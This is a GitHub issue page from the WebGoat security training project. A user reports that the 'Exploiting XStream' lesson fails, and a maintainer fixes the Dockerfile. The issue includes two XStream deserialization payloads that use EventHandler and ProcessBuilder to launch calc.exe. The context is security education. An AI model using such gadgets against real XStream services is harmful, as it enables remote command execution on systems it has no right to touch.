8000 "Exploiting XStream" assignment does not work · Issue #1134 · WebGoat/WebGoat · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

"Exploiting XStream" assignment does not work #1134

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Closed
plibither8 opened this issue Oct 31, 2021 · 2 com 8000 ments
Closed

"Exploiting XStream" assignment does not work #1134

plibither8 opened this issue Oct 31, 2021 · 2 comments
Assignees
@nbaars
Labels
waiting for release Issue is fix, waiting on new release
Milestone
2023.0

Comments

@plibither8
Copy link
plibither8 commented Oct 31, 2021
edited
Loading

I have tried the following variations that are "supposed" to work as mentioned in:

<contact class='org.owasp.webgoat.vulnerable_components.Contact'>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>
<contact class='dynamic-proxy'>
  <interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
  <handler class='java.beans.EventHandler'>
    <target class='java.lang.ProcessBuilder'>
      <command>
        <string>calc.exe</string>
      </command>
    </target>
    <action>start</action>
  </handler>
</contact>

Both give similar errors like so:

Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
---- Debugging information ----
message : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
cause-exception : com.thoughtworks.xstream.converters.reflection.ObjectAccessException
cause-message : Cannot construct org.owasp.webgoat.vulnerable_components.Contact : org.owasp.webgoat.vulnerable_components.Contact
class : org.owasp.webgoat.vulnerable_components.Contact
required-type : org.owasp.webgoat.vulnerable_components.Contact
converter-type : com.thoughtworks.xstream.converters.reflection.ReflectionConverter
path : /contact
line number : 1
version : 1.4.5
-------------------------------
nbaars added a commit that referenced this issue Oct 31, 2021
@nbaars
#1134: dAdd missing opening of module
0a71799
@nbaars
Copy link
Collaborator
nbaars commented Oct 31, 2021

@plibither8 thanks, we missed one module in the Dockerfile

@nbaars nbaars added the waiting for release Issue is fix, waiting on new release label Oct 31, 2021
@nbaars nbaars self-assigned this Oct 31, 2021
@nbaars nbaars added this to the 8.2.3 milestone Oct 31, 2021
@nbaars
Copy link
Collaborator
nbaars commented Jan 6, 2023

Closing as we released 2023.3

@nbaars nbaars closed this as completed Jan 6, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@nbaars nbaars

Labels
waiting for release Issue is fix, waiting on new release
Projects
None yet
Milestone
2023.0
Development

No branches or pull requests
2 participants
@nbaars @plibither8
0